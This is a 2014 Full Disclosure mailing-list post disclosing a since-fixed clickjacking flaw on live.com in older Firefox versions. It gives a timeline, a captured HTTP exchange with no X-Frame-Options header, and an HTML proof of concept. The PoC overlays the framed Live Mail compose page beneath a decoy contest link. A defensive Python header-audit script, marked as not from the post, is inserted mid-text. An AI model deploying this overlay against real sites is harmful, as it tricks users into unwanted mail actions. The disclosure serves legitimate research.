Message-ID: <CALq7B353No6a4K+-_=PciCyCXN_JoAm27OLEPZo0AqdyPCvp-w@mail.gmail.com>
Date: Fri, 25 Apr 2014 18:11:03 +0530
From: Sandeep Kamble <sandeepk.l337@...il.com>
To: full-disclosure <full-disclosure@...ts.grok.org.uk>, fulldisclosure@...lists.org
Subject: [FD] UI redress attack on live.com (affected all pages)
On 7/29/13 I reported a Live.com XFO vulnerability to the *Microsoft
Security team*, and finally their investigation came to a conclusion and they fixed
the bug. So, here are the details of the bug and the timeline of fixing it. A year ago,
on the weekend, I started digging into MS services for bugs.
The timeline of investigation of the bug: July 29, 2013 - April 16, 2014.
[image: msresponse.jpg]
The interesting part of the vulnerability: all pages were protected against *UI
Redressing Attack*, and while testing, I normally test the application on
all browsers. The weird part comes here: I was able to iframe all
the pages of Live.com, including pre-authentication and post-authentication
pages, on Mozilla Firefox 3.6.28 to Mozilla Firefox 6. On Chrome and on
other browsers, the XFO functionality of all pages was working perfectly.
Random announcement, nothing to do with this post: Check out the recorded video
of the Garage4Hackers Ranchoddas Webcast Series - Browser Crash Analysis by
David Rude II aka Bannedit <https://www.youtube.com/watch?v=Qk0ORbFZ81I>
Note: Have a look at the same vulnerability in Facebook Application Installing
<http://www.garage4hackers.com/showthread.php?t=2528>
Obviously, you must be thinking why this is happening with Mozilla.
After doing some research and consulting with the *G4H team*, I've concluded
it may be an issue with the *Gecko Engine*. The test environment was Win 7,
Ubuntu 10, 11, 12.
Note: If you have stumbled upon the same issue with Gecko, then please
reply on this thread.
Check out the following headers; the XFO header is missing on Gecko/20120306
Firefox/3.6.28 to MF 6.
Code:
https://blu166.mail.live.com/m/?bfv=wm

GET /m/?bfv=wm HTTP/1.1
Host: blu166.mail.live.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie:

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Wlp-StartTime: 29-07-2013 10:10:32 AM
xxn: 22
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
MSNSERVER: H: BLU166-W22 V: 17.1.6722.6001 D: 2013-07-22T22:56:20
X-Powered-By: ASP.NET
Content-Length: 3113
Date: Mon, 29 Jul 2013 10:10:32 GMT
Connection: keep-alive
Set-Cookie: bfv=wm; domain=.live.com; path=/
Set-Cookie: widecontext=X; path=/; secure
Set-Cookie: domain=.live.com; path=/
Set-Cookie: xidseq=7; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Mon, 29-Jul-2013 08:30:32 GMT; path=/
Cache-Control: no-cache, no-store, must-revalidate, no-transform
Pragma: no-cache
Expires: -1, -1
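An added check (example code, not from the post or from Microsoft): a small Python audit that parses a captured response head like the one above and reports whether it carries any anti-framing header at all. Both sample responses are constructed here; the first mirrors the capture's lack of X-Frame-Options, the second is a hypothetical hardened response for the same page.

```python
from typing import Dict, List, Tuple

def parse_headers(raw: str) -> Dict[str, List[str]]:
    """Parse an HTTP response head into {name.lower(): [values]}; rejoins wrapped lines."""
    headers: Dict[str, List[str]] = {}
    last = None
    for line in raw.strip().splitlines()[1:]:      # [0] is the status line
        if line[:1] in (" ", "\t") and last:       # continuation of the previous header
            headers[last][-1] += " " + line.strip()
            continue
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        last = name.strip().lower()
        headers.setdefault(last, []).append(value.strip())
    return headers

def frame_protection(raw: str) -> Tuple[bool, str]:
    """Return (protected, reason). CSP frame-ancestors overrides X-Frame-Options."""
    h = parse_headers(raw)
    for csp in h.get("content-security-policy", []):
        for directive in csp.split(";"):
            parts = directive.split()
            if parts and parts[0].lower() == "frame-ancestors":
                return True, "CSP frame-ancestors " + " ".join(parts[1:])
    xfo = [v.upper() for v in h.get("x-frame-options", [])]
    if not xfo:
        return False, "no X-Frame-Options and no CSP frame-ancestors"
    if len(set(xfo)) > 1:                 # conflicting duplicates are ignored by browsers
        return False, "conflicting X-Frame-Options values: " + ", ".join(xfo)
    if xfo[0] in ("DENY", "SAMEORIGIN"):
        return True, "X-Frame-Options " + xfo[0]
    if xfo[0].startswith("ALLOW-FROM"):   # never widely supported; treat as unprotected
        return False, "X-Frame-Options ALLOW-FROM is not honoured by most browsers"
    return False, "unrecognised X-Frame-Options value: " + xfo[0]

# Constructed samples: FIREFOX36 mirrors the capture above (no anti-framing header);
# HARDENED is a hypothetical fixed response, not anything live.com actually sent.
FIREFOX36 = """HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, no-transform
"""
HARDENED = """HTTP/1.1 200 OK
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'
"""

if __name__ == "__main__":
    for label, raw in {"Firefox/3.6.28": FIREFOX36, "hardened": HARDENED}.items():
        ok, why = frame_protection(raw)
        print(f"{label:15} {'PROTECTED' if ok else 'FRAMEABLE'}  {why}")
```

Feeding it one capture per User-Agent, as the post did by hand, makes a UA-dependent omission like this one show up as a single FRAMEABLE row.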
Here are some screenshots of basic operations of live.com (I would like to
remind you, every page of live.com was vulnerable).
The attacker developed this page to attack the victim.
*Composing Email : *
*Uploading Attachment : *
*Deleting Emails : *
[image: https://dl.dropboxusercontent.com/u/18007092/ms-click4.png]
HTML POC, which I sent to the MS Security Team
Code:
<html>
<!-- Quickly developed POC, for testing purposes -->
<!-- Visit Garage4hackers.com -->
<head>
<title> Live Mail Send Clickjacking - Garage4hackers.com </title>
<style>
iframe {
width:800px;
height:800px;
position:absolute;
top:0; left:0;
filter:alpha(opacity=50); /* in real life opacity=0 */
opacity:0.5;
}
</style>
</head>
<body>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<div><center>Bhag Milkha Bhag Competition</center></div>
<center><b>Click Connect, You will Bhag Milkha Bhag T-shirts. </b></center>
<!-- the framed compose page sits on top of the decoy link; half-transparent here so the overlay is visible -->
<iframe src="https://blu166.mail.live.com/m/compose.m/?fid=00000000-0000-0000-0000-000000000001&to=sandeepk.l337@gmail.com"></iframe>
<a href="http://www.google.com" target="_blank" style="position: relative; left: 0px; top: 220px; z-index: -1;">Connect</a>
</body>
</html>
- [S]
Garage4hackers.com
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/